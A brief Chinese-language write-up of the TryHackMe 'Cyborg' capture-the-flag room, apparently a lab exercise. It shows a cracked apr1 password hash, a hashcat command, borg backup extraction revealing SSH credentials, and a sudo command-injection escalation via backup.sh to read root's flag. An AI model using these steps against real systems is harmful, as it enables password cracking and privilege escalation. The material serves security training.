TryHackMe-Cyborg

Task1

Task2

nmap扫描探测

目录扫描

在/etc中发现了两个文件

分别是

1
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
1
2
3
4
5
6
7
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users

通过hash-identifier发现了是md5(ARP)

1
hashcat -m 1600 -a 0 hash /usr/share/wordlists/rockyou.txt

解出了密码

探测/admin

下载了一个tar的文件

1
tar -xvf file

进行解压文件,然后切换进入目录

发现了这里运用了borgbackup的应用

了解相关的使用后

发现了music_archive

利用borg进行解压

发现了ssh的账密

进行登录

进行sudo -l发现了backup.sh

看不懂代码,喊GPT看看

1
sudo ./backup.sh -c whoami
1
sudo ./backup.sh -c "cat /root/root.txt"